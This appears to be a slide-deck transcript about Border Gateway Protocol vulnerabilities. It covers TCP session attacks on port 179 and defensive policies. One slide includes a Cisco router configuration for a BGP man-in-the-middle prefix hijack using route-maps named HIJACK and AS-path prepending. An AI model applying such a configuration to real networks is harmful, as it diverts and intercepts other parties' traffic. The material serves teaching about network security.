bgp vulnerability
TRANSCRIPT
COMMUNICATION
Analog communication Digital communication Analog communication to
digital communication convergence
Internet Protocol
FUTURE COMMUNICATION
IP based communication will become the core communication?
Scalability and reliability communication infrastructure?
Vulnerability and security threat?
CORE COMMUNICATION
Access Control List? Default password issue? Weak password? Unencrypted remote login? Routing protocol vulnerability? We will focus on Border Gateway
Protocol (BGP) now
BGP VULNERABILITY
BGP messages TCP vulnerability BGP internet man in the
middle Documented on RFC 4272
BGP MESSAGES
BGP states? idle, connect, active, opensent, openconfirm, established
BGP message? open, update, notification, keep alive
BGP message modification to poison routing table and Denial of Service
Complex and nearly impractical
TCP VULNERABILITY
BGP and TCP port 179 SPOOFED TCP RST/FIN? TCP port flooding (SYN) TCP session ends = BGP idle
BGP MAN IN THE MIDDLE More specific network prefix wins Use tracroute to identify routing
from source to destination Use route-map and AS-PATH
prepending Static routing to give information
about next-hop-router
router bgp 100network 10.10.220.0 mask 255.255.255.0neighbor 2.2.4.2 remoteas 40neighbor 2.2.4.2 prefixlist JACKED outneighbor 2.2.4.2 routemap HIJACK outneighbor 4.3.2.1 remoteas 10neighbor 4.3.2.1 prefixlist ANN outneighbor 5.4.3.1 remoteas 60neighbor 5.4.3.1 prefixlist JACKED outneighbor 5.4.3.1 routemap HIJACK out!ip route 10.10.220.0 255.255.255.0 4.3.2.1!ip prefixlist ANN seq 10 permit 2.2.4.0/24ip prefixlist ANN seq 15 permit 4.3.2.0/24ip prefixlist ANN seq 20 permit 5.4.3.0/24!ip prefixlist JACKED seq 10 permit 2.2.4.0/24ip prefixlist JACKED seq 15 permit 4.3.2.0/24ip prefixlist JACKED seq 20 permit 5.4.3.0/24ip prefixlist JACKED seq 25 permit 10.10.220.0/24routemap HIJACK permit 10set aspath prepend 10 20 200
SOME POLICIES
Design and topology? Access Control List implementation? Complex password Encrypted connection (SSH & HTTPS)